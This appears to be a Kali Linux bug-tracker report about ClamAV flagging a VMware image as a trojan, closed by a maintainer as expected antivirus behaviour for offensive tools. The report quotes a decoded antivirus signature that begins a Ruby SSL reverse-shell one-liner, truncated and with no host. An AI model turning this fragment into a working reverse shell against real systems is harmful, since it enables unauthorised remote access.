0008023: ClamAV detected trojan in Kali Vmware 64bits image

ID	Project	Category	View Status	Date Submitted	Last Update

0008023	Kali Linux	General Bug	public	2022-10-25 22:20	2022-10-26 05:13

Reporter	trojan_bad	Assigned To	steev
Priority	urgent	Severity	major	Reproducibility	have not tried
Status	closed	Resolution	no change required

Summary	0008023: ClamAV detected trojan in Kali Vmware 64bits image
Description	Today I ran clamAV on my computer and it yielded an infected file with code Unix.Trojan.MSShecllcode-10. I then performed a Virus Total Analysis of the file. 2 out of 69 vendors identify this as a malicious file, being them google and clamAV This file is a chunk of a kali linux distribution image for vmware 64 bits that I downloaded through a torrent, pointed by the official website. Running `sigtool --find-sigs Unix.Trojan.MSShellcode-10 \| awk '{ print $2 }' \| sigtool --decode-sigs` I get the decoded signature: `ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSock` I did not verify the signature so that is on me, but either way, this is unexpected behavior and should be solved. Virus total analysis: https://www.virustotal.com/gui/file/ae6391c132598358bb1409b30f901e5de2158994aa8ab92eb332fdc8884922a2/detection
Steps To Reproduce	Did not try to reproduce

Date Modified	Username	Field	Change
2022-10-25 22:20	trojan_bad	New Issue
2022-10-26 05:13	steev	Assigned To	=> steev
2022-10-26 05:13	steev	Status	new => closed
2022-10-26 05:13	steev	Resolution	open => no change required
2022-10-26 05:13	steev	Note Added: 0017001

steev 2022-10-26 05:13 manager ~0017001	This may come as a shock, but tools in Kali can be used maliciously. As such, antivirus engines can, and do, mark them as possible viruses. There is nothing to be changed on our end, this is working as intended.